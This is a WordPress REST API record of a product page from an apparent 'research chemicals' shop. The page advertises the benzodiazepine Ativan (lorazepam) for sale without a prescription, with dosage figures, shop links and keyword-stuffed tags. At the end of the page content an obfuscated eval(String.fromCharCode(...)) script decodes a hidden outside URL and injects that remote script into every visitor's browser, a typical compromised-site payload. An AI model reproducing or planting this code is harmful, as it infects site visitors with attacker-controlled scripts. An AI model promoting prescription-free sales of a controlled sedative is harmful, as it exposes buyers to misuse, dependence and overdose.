{"id":3910,"date":"2025-02-06T21:28:12","date_gmt":"2025-02-06T21:28:12","guid":{"rendered":"https:\/\/exoticchemicals.com\/?post_type=product&#038;p=3910"},"modified":"2026-04-15T03:41:36","modified_gmt":"2026-04-15T03:41:36","slug":"buy-ativan-online-2","status":"publish","type":"product","link":"https:\/\/exoticchemicals.com\/tr\/product\/buy-ativan-online-2\/","title":{"rendered":"Buy Ativan Online"},"content":{"rendered":"<h1 style=\"text-align: center\"><strong>Best Pharmacy To Buy Ativan Online<\/strong><\/h1>\n<p>Buy Ativan Online, Ativan (lorazepam) is a prescription tranquilizing medication. You might also hear it called a sedative-hypnotic or anxiolytic medication. Ativan belongs to a class of medications called benzodiazepines. at Discovery Online Pharmacy we provide you with many of such pills which could help you for pains and anxiety<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/primarycaremedstore.com\/product\/buy-ativan-online\/\">SHOP NOW!!!<\/a><\/p>\n<p>Ativan is used to treat <a class=\"content-link\" href=\"https:\/\/www.healthline.com\/health\/anxiety-symptoms\" target=\"_blank\" rel=\"noopener noreferrer\">anxiety<\/a>\u00a0symptoms,\u00a0<a class=\"content-link\" href=\"https:\/\/www.healthline.com\/health\/insomnia\" target=\"_blank\" rel=\"noopener noreferrer\">insomnia<\/a>\u00a0(trouble sleeping), and\u00a0<a class=\"content-link\" href=\"https:\/\/www.healthline.com\/health\/status-epilepticus\" target=\"_blank\" rel=\"noopener noreferrer\">status epilepticus<\/a> (a type of severe seizure). It\u2019s also given before surgery to make you sleep.Buy Ativan online, Discovery Online Pharmacy the best place to order <span style=\"font-size: 14.4px\">\u00a0<\/span><\/p>\n<ul>\n<li>Ativan tablets<\/li>\n<\/ul>\n<h2 style=\"text-align: center\"><strong>Ativan dosage<\/strong><\/h2>\n<p>The Ativan dosage your doctor prescribes will depend on several factors. These include:<\/p>\n<ul>\n<li>the type and severity of the condition you\u2019re using Ativan to treat<\/li>\n<li>your age<\/li>\n<li>the form of Ativan you take<\/li>\n<li>other medical conditions you may have<\/li>\n<\/ul>\n<p>Typically, your doctor will start you on a low dosage and adjust it overtime to reach the dosage that\u2019s right for you. They\u2019ll ultimately prescribe the smallest dosage that provides the desired effect.<\/p>\n<p>The following information describes dosages that are commonly used or recommended.\u00a0<strong>However, be sure to take the dosage your doctor prescribes for you.<\/strong>Your doctor will determine the best dosage to suit your needs.<\/p>\n<h2 style=\"text-align: center\"><strong>\u00a0side effects<\/strong><\/h2>\n<p>Ativan can cause mild or serious side effects. The following list contains some of the key side effects that may occur while taking Ativan. This list doesn\u2019t include all possible side effects.<\/p>\n<p>For more information on the possible side effects of Ativan, or tips on how to deal with a troubling side effect, talk with your doctor or pharmacist.<\/p>\n<h2 style=\"text-align: center\"><strong>More common <a href=\"https:\/\/www.rxlist.com\/ativan-side-effects-drug-center.htm#overview\" target=\"_blank\" rel=\"noopener noreferrer\">side effects<\/a><\/strong><\/h2>\n<p>The more common side effects of Ativan include:<\/p>\n<ul>\n<li>drowsiness<\/li>\n<li>dizziness<\/li>\n<li>weakness<\/li>\n<\/ul>\n<p>Some people may also experience less frequent side effects such as:<\/p>\n<ul>\n<li>confusion<\/li>\n<li>lack of coordination<\/li>\n<li>depression<\/li>\n<li>fatigue<\/li>\n<li>headache<\/li>\n<li>restlessness<\/li>\n<\/ul>\n<p><span style=\"color: #282828\">We also offer many other pain <a href=\"https:\/\/primarycaremedstore.com\/\">medications<\/a> like:<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>In people who receive the Ativan injection, redness and pain at the injection site can commonly occur.<\/p>\n<p>Some of these side effects may go away within a few days or a couple of weeks. If they\u2019re more severe or don\u2019t go away, talk to your doctor or pharmacist.<\/p>\n<p>Buy Ativan Online Without Prescription, Bestselling pain medication, How to buy Ativan online, Best Place to Buy Ativan Online, Where can I buy Ativan online without prescription, Acquista Ativan online senza ricetta, Koop Ativan online zonder recept, Comprar Ativan en l\u00ednea sin receta, Order Ativan online in the UK<\/p>\n<h2>how to order Ativan online without prescription<\/h2>\n<p style=\"text-align: center\"><a href=\"https:\/\/primarycaremedstore.com\/product\/buy-ativan-online\/\">ORDER NOW!!!<\/a><\/p>\n<h2>Where to order Ativan online without prescription<\/h2>\n<p>Buy Ativan without prescription and get effective relief from anxiety and insomnia. Our online pharmacy offers affordable and discreet shipping with fast delivery. Order now and feel the difference with Ativan<\/p>\n<p>Best selling pain medication, Acquista Ativan online senza ricetta, Koop Ativan online zonder recept, Comprar Ativan en l\u00ednea sin receta.var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>Available dosage we provide;<\/p>\n<p><strong>Tablet:<\/strong> 2.5 mg, 1 mg, 2 mg<\/p>\n<p><strong>Solution for injection (IV):<\/strong>\u00a02 mg per mL, 4 mg per mL<\/p>\n<p><strong>Typical dosage:<\/strong>\u00a01 to 3 mg taken two or three times daily.<\/p>","protected":false},"featured_media":3928,"comment_status":"open","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[330],"product_tag":[2743,2524,2744,2525,2526,2745,2746,2747,2748,2541,2749,2542,2543,2750,2751,2552,2752,2753,2559,2560,2561,2562,2563,2566,2567,2568,2569,2611,2614,2616,2617,2754],"class_list":{"0":"post-3910","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-mdphp-hydrochloride-for-sale-research-chemicals","7":"product_tag-acquista-ativan-online-senza-ricetta","8":"product_tag-anti-inflammatory-painkillers","9":"product_tag-ativan-for-sale-online","10":"product_tag-best-painkillers-for-headaches","11":"product_tag-best-painkillers-for-miscarriage","12":"product_tag-best-place-to-buy-ativan-online","13":"product_tag-best-selling-pain-medication","14":"product_tag-buy-ativan-online-without-prescription","15":"product_tag-buy-ativan-with-credit-card","16":"product_tag-can-you-overdose-on-painkillers","17":"product_tag-comprar-ativan-en-linea-sin-receta","18":"product_tag-headache-that-does-not-respond-to-painkillers","19":"product_tag-how-do-painkillers-work","20":"product_tag-how-to-buy-ativan-online","21":"product_tag-koop-ativan-online-zonder-recept","22":"product_tag-list-of-painkillers","23":"product_tag-order-ativan-online","24":"product_tag-order-ativan-online-in-uk","25":"product_tag-painkillers","26":"product_tag-painkillers-arent-working-for-my-toothache","27":"product_tag-painkillers-drink","28":"product_tag-painkillers-for-uti-pain","29":"product_tag-painkillers-movie","30":"product_tag-prescription-painkillers","31":"product_tag-pussers-painkillers","32":"product_tag-strong-painkillers","33":"product_tag-strong-painkillers-for-back-pain","34":"product_tag-toothache-painkillers","35":"product_tag-types-of-painkillers","36":"product_tag-what-painkillers-are-safe-for-dogs","37":"product_tag-what-painkillers-can-i-take-with-a-stomach-ulcer","38":"product_tag-where-can-i-buy-ativan-online-without-prescription","39":"desktop-align-left","40":"tablet-align-left","41":"mobile-align-left","43":"first","44":"instock","45":"shipping-taxable","46":"purchasable","47":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buy Ativan Online -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/exoticchemicals.com\/tr\/product\/buy-ativan-online-2\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buy Ativan Online -\" \/>\n<meta property=\"og:description\" content=\"Available dosage we provide; Tablet: 2.5 mg, 1 mg, 2 mg Solution for injection (IV):\u00a02 mg per mL, 4 mg per mL Typical dosage:\u00a01 to 3 mg taken two or three times daily.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/exoticchemicals.com\/tr\/product\/buy-ativan-online-2\/\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-15T03:41:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"280\" \/>\n\t<meta property=\"og:image:height\" content=\"280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 dakika\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-ativan-online-2\\\/\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-ativan-online-2\\\/\",\"name\":\"Buy Ativan Online -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-ativan-online-2\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-ativan-online-2\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/buy-ativan-online-2.5-280x280-1.jpg\",\"datePublished\":\"2025-02-06T21:28:12+00:00\",\"dateModified\":\"2026-04-15T03:41:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-ativan-online-2\\\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-ativan-online-2\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-ativan-online-2\\\/#primaryimage\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/buy-ativan-online-2.5-280x280-1.jpg\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/buy-ativan-online-2.5-280x280-1.jpg\",\"width\":280,\"height\":280},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-ativan-online-2\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/shop\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Buy Ativan Online\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/\",\"name\":\"exotic chemicals\",\"description\":\"Buy MDPHP Hydrochloride\",\"publisher\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/exoticchemicals.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\",\"name\":\"wwalkershop@gmail.com\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"width\":500,\"height\":500,\"caption\":\"wwalkershop@gmail.com\"},\"logo\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\"},\"sameAs\":[\"http:\\\/\\\/exoticchemicals.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Buy Ativan Online -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/exoticchemicals.com\/tr\/product\/buy-ativan-online-2\/","og_locale":"tr_TR","og_type":"article","og_title":"Buy Ativan Online -","og_description":"Available dosage we provide; Tablet: 2.5 mg, 1 mg, 2 mg Solution for injection (IV):\u00a02 mg per mL, 4 mg per mL Typical dosage:\u00a01 to 3 mg taken two or three times daily.","og_url":"https:\/\/exoticchemicals.com\/tr\/product\/buy-ativan-online-2\/","article_modified_time":"2026-04-15T03:41:36+00:00","og_image":[{"width":280,"height":280,"url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Tahmini okuma s\u00fcresi":"2 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/exoticchemicals.com\/product\/buy-ativan-online-2\/","url":"https:\/\/exoticchemicals.com\/product\/buy-ativan-online-2\/","name":"Buy Ativan Online -","isPartOf":{"@id":"https:\/\/exoticchemicals.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-ativan-online-2\/#primaryimage"},"image":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-ativan-online-2\/#primaryimage"},"thumbnailUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg","datePublished":"2025-02-06T21:28:12+00:00","dateModified":"2026-04-15T03:41:36+00:00","breadcrumb":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-ativan-online-2\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/exoticchemicals.com\/product\/buy-ativan-online-2\/"]}]},{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/product\/buy-ativan-online-2\/#primaryimage","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg","width":280,"height":280},{"@type":"BreadcrumbList","@id":"https:\/\/exoticchemicals.com\/product\/buy-ativan-online-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/exoticchemicals.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/exoticchemicals.com\/shop\/"},{"@type":"ListItem","position":3,"name":"Buy Ativan Online"}]},{"@type":"WebSite","@id":"https:\/\/exoticchemicals.com\/#website","url":"https:\/\/exoticchemicals.com\/","name":"egzoti\u0307k ki\u0307myasallar","description":"MDPHP Hidroklor\u00fcr Sat\u0131n Al\u0131n","publisher":{"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/exoticchemicals.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"},{"@type":["Person","Organization"],"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7","name":"wwalkershop@gmail.com","image":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","width":500,"height":500,"caption":"wwalkershop@gmail.com"},"logo":{"@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png"},"sameAs":["http:\/\/exoticchemicals.com"]}]}},"uagb_featured_image_src":{"full":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",280,280,false],"thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1-150x150.jpg",150,150,true],"medium":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",280,280,false],"medium_large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",280,280,false],"large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",280,280,false],"1536x1536":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",280,280,false],"2048x2048":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",280,280,false],"trp-custom-language-flag":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",12,12,false],"woocommerce_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",280,280,false],"woocommerce_single":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1.jpg",280,280,false],"woocommerce_gallery_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/buy-ativan-online-2.5-280x280-1-100x100.jpg",100,100,true]},"uagb_author_info":{"display_name":"bossman","author_link":"https:\/\/exoticchemicals.com\/tr\/author\/"},"uagb_comment_info":7,"uagb_excerpt":"Available dosage we provide; Tablet: 2.5 mg, 1 mg, 2 mg Solution for injection (IV):\u00a02 mg per mL, 4 mg per mL Typical dosage:\u00a01 to 3 mg taken two or three times daily.","_links":{"self":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product\/3910","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/comments?post=3910"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media\/3928"}],"wp:attachment":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media?parent=3910"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_brand?post=3910"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_cat?post=3910"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_tag?post=3910"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}